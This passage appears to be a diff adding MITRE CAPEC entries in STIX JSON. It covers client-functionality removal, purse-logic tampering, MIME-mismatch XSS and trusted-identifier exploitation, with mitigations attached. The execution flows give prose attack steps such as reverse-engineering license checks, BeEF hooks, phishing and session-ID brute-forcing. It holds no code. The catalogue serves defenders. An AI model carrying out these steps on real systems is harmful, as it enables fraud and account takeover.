"course-of-action--55870da4-61f0-486d-8c7e-a97282372d45", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c4654c1-b126-432b-9cd3-6dcbe787801b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55870da4-61f0-486d-8c7e-a97282372d45", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if a piece of software has a valid and trusted digital signature, it should be assessed for any weaknesses and vulnerabilities.", + "id": "course-of-action--9d35e87c-32b7-43a8-b58b-befcae839597", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44707875-683c-4f12-b340-14848083ceec", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d35e87c-32b7-43a8-b58b-befcae839597", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", 
+ "description": "An adversary removes or disables functionality on the client that the server assumes to be present and trustworthy.", + "external_references": [ + { + "external_id": "CAPEC-207", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/207.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-75", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Greasemonkey" + }, + { + "description": "Firebug", + "external_id": "REF-76", + "source_name": "reference_from_CAPEC", + "url": "http://getfirebug.com/" + }, + { + "description": "Mozilla Firefox Add-ons", + "external_id": "REF-77", + "source_name": "reference_from_CAPEC", + "url": "https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" + } + ], + "id": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Removing Important Client Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The adversary reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. 
Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the adversary simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.", + "The adversary uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the adversary directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.

  2. Techniques
    The adversary probes by exploring an application's functionality and its underlying mapping to server-side components.
    The adversary reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation.

Experiment

  1. Determine which functionality to disable or remove: The adversary tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.

  2. Techniques
    The adversary reverse engineers the client-side code to determine which functionality to disable or remove.

Exploit

  1. Disable or remove the critical functionality from the client code: Once the functionality has been determined, the adversary disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.

  2. Techniques
    The adversary disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server.
", + "x_capec_extended_description": "\n Adversaries can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an adversary can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05" + ], + "x_capec_prerequisites": [ + "The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client." + ], + "x_capec_resources_required": [ + "The adversary must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary." 
+ ], + "x_capec_skills_required": { + "High": "To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.", + "Low": "The adversary installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.", + "id": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5ee791d-5a7a-424b-8425-74c45b4c310e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ship client-side application with integrity checks (code signing) when possible.", + "id": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-1", 
+ "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bc683ec3-bdbd-4f4b-9388-34935ef7440e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the client code.", + "id": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--471fb693-94a4-42fa-a5d0-f5f7f15c36a9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.", + "external_references": [ + { + "external_id": "CAPEC-209", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-646", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/646.html" + }, + { + "description": "OWASP Testing Guide (v4), The Open Web Application Security Project (OWASP)", + "external_id": "REF-78", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)" + } + ], + "id": "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Using MIME Type Mismatch", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + 
"x_capec_child_of_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file's real type and invokes the appropriate interpreter, scripted content could be invoked.", + "In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all areas that allow a user to upload content through an HTTP POST request. This is typically found in blogs or forums.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to file upload features
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for MIME type mismatch: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and uploads files with scripting content, but whose MIME type is specified as a file type that cannot execute scripting content. If the application only checks the MIME type of the file, it may let the file through, causing the script to be executed by any user who accesses the file.

  2. Techniques
    Upload a script file with a MIME type of text/plain to a forum and then access the uploaded file to see if the script is executed. If possible, the script displays a unique identifier so the adversary knows for certain it was executed when testing.
  3. Store malicious XSS content: Once the adversary has determined which file upload locations are vulnerable to MIME type mismatch, they will upload a malicious script disguised as a non scripting file. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

  4. Techniques
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

  2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
", + "x_capec_prerequisites": [ + "The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.", + "The victim's browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to source the file of the incorrect MIME type containing a script." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": "Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. 
When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

  2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

  2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. 
An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." 
+ ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.", + "id": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f9eaa515-4e04-4e48-a95a-a5cc76d3fae0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. 
Many standard web and application servers will perform this task on your behalf.", + "id": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65db9cb6-fc43-4034-b579-eb165dd5e4cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.", + "id": "course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e264f74e-3bd0-46ab-bd67-3526a6e9d54f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.", + "id": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12007caf-e1d7-492f-a685-f88c073bccb6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use strong session identifiers that are protected in transit and at rest.", + "id": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a4a61eb-f51c-417d-88d8-2417fea9f0a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.", + "id": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c05cd2c-a62f-42aa-b4f2-db68b48a7d78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 